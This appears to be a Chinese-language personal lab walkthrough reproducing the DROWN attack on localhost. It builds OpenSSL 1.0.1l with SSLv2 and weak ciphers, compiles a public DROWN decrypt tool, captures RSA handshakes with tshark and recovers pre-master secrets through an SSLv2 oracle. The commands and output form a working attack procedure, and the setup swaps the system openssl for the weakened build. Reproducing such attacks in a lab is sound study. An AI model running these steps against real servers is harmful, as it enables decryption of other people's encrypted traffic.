fuckopenssl 1.0.1l
[TOC]
2021-08-10 14:19:38
@Auther by : sizaif
安装 openssl 1.0.1l
不整幺蛾子, 就默认安装位置
code
wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers
make && make install
# 默认安装位置在 /usr/local/ssl更改版本信息
code
# 将旧版本的openssl进行备份
# 如果已经是root 了 就不用sudo
sudo mv /usr/bin/openssl /usr/bin/openssl.old
# 将新版本的openssl进行软链接
sudo ln -s /usr/local/ssl/bin/openssl /usr/bin/openssl
#进入etc目录
cd /etc/
#下一步一定要切换到root用户
# 如果已经是root 用户, 直接执行 echo "/usr/local/lib" >> ld.so.conf
su
#将openssl的安装路径加入配置中
echo "/usr/local/lib" >> ld.so.conf
# 重新加载配置
ldconfig 结果如图:
图片
编译drown
git clone https://github.com/Tim---/drown
SSL_PREFIX=/usr/local/ssl make结果如图:
图片
./decrypt host:port certfile c
# ./decrypt 127.0.0.1:7899 certfile c
# 
Passive attack
Passive attack
# 因为已经将 openssl1.0.1l 配置到系统环境, 所以可以直接使用openssl 命令
#
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days
# 结果如下:
#########################################################################################
root@iZj6cg4e6vhdv5s3hpkoffZ:~/supengfei/drown/fuck# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
Generating a 2048 bit RSA private key
...........................+++
....+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
# 这里输入的是fuckopenssl
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:zh
State or Province Name (full name) [Some-State]:beijing
Locality Name (eg, city) []:beijing
Organization Name (eg, company) [Internet Widgits Pty Ltd]:IBM
Organizational Unit Name (eg, section) []:123
Common Name (e.g. server FQDN or YOUR name) []:root
Email Address []:123456@123.com
#########################################################################################
openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
#
#########################################################################################
root@iZj6cg4e6vhdv5s3hpkoffZ:~/supengfei/drown/fuck# openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
Enter pass phrase for key.pem:
# 这里输入的是上面的fuckopenssl
Using default temp DH parameters
Using default temp ECDH parameters
ACCEPT
#########################################################################################
# 打开新窗口
# 安装 tshark
apt-get install tshark
#
tshark -i lo -w handshakes.cap tcp port 4433
code
# 打开新窗口
# openssl 已经配置到系统环境, 所以直接使用openssl 命令
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done
# 展示
#########################################################################################
New, TLSv1/SSLv3, Cipher is AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : AES256-GCM-SHA384
Session-ID: 49EB9A81AD65AE80476F9F72CF4472D17CFB4E33539DAAE5734B5BD2EFD878F3
Session-ID-ctx: 01000000
Master-Key: CCCF32EBBEC91A411D63589FBFAD0B2CE8290797D2749BAF3FFD5C05A4CAB79CFE2E0DAC2939155721DF65218B9757EE
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
Start Time: 1620033794
Timeout : 300 (sec)
Verify return code: 0 (ok)
---
128 items in the session cache
0 client connects (SSL_connect())
0 client renegotiates (SSL_connect())
0 client connects that finished
1000 server accepts (SSL_accept())
0 server renegotiates (SSL_accept())
1000 server accepts that finished
0 session cache hits
0 session cache misses
0 session cache timeouts
0 callback cache hits
872 cache full overflows (128 allowed)
---
no client certificate available
</BODY></HTML>
read:errno=0
#########################################################################################
# get the encrypted pre-master secrets for each session with
tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :结果如下:
图片
code
# To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :
openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2
#########################################################################################
root@iZj6cg4e6vhdv5s3hpkoffZ:~/supengfei/drown/fuck# openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2
Enter pass phrase for key.pem:
# 这里输入的是 上面的pem: fuckfuckfuck
Using default temp DH parameters
Using default temp ECDH parameters
ACCEPT
#########################################################################################
# We can now decrypt the encrypted pre-master secret
#在drown/fuck/目录下执行
#########################################################################################
# root@iZj6cg4e6vhdv5s3hpkoffZ:~# ll supengfei/drown/fuck/
# total 8024
# drwxr-xr-x 2 root root 4096 May 3 17:33 ./
# drwxr-xr-x 4 root root 4096 May 3 17:28 ../
# -rw-r--r-- 1 root root 1375 May 3 17:14 cert.pem
# -rw------- 1 root root 8196592 May 3 17:23 handshakes.cap
# -rw-r--r-- 1 root root 1834 May 3 17:14 key.pem
# -rw-r--r-- 1 root root 0 May 3 17:33 pms.tx
# -rw-r--r-- 1 root root 0 May 3 17:28 pms.txt
# root@iZj6cg4e6vhdv5s3hpkoffZ:~#
#########################################################################################
#这个位置是cert.perm handshakes.cap 的位置
# ../decrypt 是drown目录下编译后会生成一个decrypt可执行文件位置
tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ../decrypt localhost:4434 cert.pem > pms.txt
结果展示
图片
code
RSA 830cdf70dc488c8b 0303b45e46017e9dfefd22a26b7c64648fb2d00fcf8627cb0070132e370ab57a1b595e2544b1668caf3618942c2a0e34
RSA a62c4d1a5c4322e2 0303e37a220b3300e6c0d139d55a1c44c2429f11b0613d746db390beb16ad8bb0203f7494d3e7385a294e4f8a18fa5ae
RSA 7215d21d1c22dfb8 0303434023187d88c73a921af635d7861ed60d66ebc4053e487ea85ab6d6b76dd373844063e8da156505dc8466310395
RSA 1976fb27fbccbd36 0303c9c320f9cc92567bc488c502ffacbbef28241348e30df4b2d55fdd7f8680fb201b5f75e02b9bd1db4e8e2c2fdf84
RSA 3b56f9c80a754f77 0303e8abf59f4132b1634f2b4e04bf4362c7f6dae5077dc9b6bb0c48efe0c7be47a256267688c7e28e70a28c830e6af6
RSA 1686f037050931a5 03036cb5a1851a174a9f43f97be770bd22411da688197bef08154d7f91f687dc6e0090d35ce147862e8bcc5c7218398c
RSA 6ce5d3fd06970d25 0303e4da20c0d6dd5e03bf97d0ee4d802cab150810df524359ab990df0a01f2d51fe6c69ebfdae99ff1b1c9042367966
RSA 0e447f6c36cadd1c 030313b76ce57518d001229385f6b3ca376821692f72401a32e8b2b9a1322f523b9dc3c4808e7975e6e96c3883c3b8c4
RSA 830280803c06b66a 0303c80069cbb7517d723d8476ff22077e7b33b10c67872093bc7793e01a501d56c2ea2f9d16266b32bd933d8d957f2b
RSA 4ee250f545d2f1ae 0303096a212344c48bfaa3153f1d1196c81beb918d61e9497033b9bd4fb118dc474187fb0965de2eff0448c072ee46e0
RSA 7b5fddbfbc5e2586 0303c7714d54a817514c086f8d4004547fb6191cbc5cd36ec7816b4ab81295278b5ba13054014413cd3abf75faa05d60
RSA 6053a37a45c64592 03035126dad66420ee530e50be0cfdb6aca5cb3e6897c3a2c1cb56c39704112efd36069e450814ccd70b629dc23e26b4
RSA a04a28e475029688 03036657caed02639f6b450a0c7293f4abf3ad188652bd443f2d27e6ffe53f859d1d91441aa0fcc646648557ecb910f8
RSA 1d37821396fecd87 030375a2214a9b475fe93ddd424a71536a0642a07d0d093abdcc84a0e1b89d3f052719e44d1816f2698d24b67ef7cc26
RSA 62a5f513fc94585b 0303a873790bf018f5d6c4e1ac4d87487a34e58471762a2dffd6d92e122ec284b7dc2206569118e0a6ebfb4c2960457d
RSA 8de0c774b04a20d2 0303e8748fbea20c72709a8dc436fc631521cbd068c6beddfacd4fb224ef03da92e76af9bbf3b740908efd699a797973
RSA a7575ef2b95aeeeb 03033f49c4e3b9642fddcda12c05601d69113adf7bebc4c0cb963ff898373a50a0494564c97a9e0ac3e18e1f709b68a9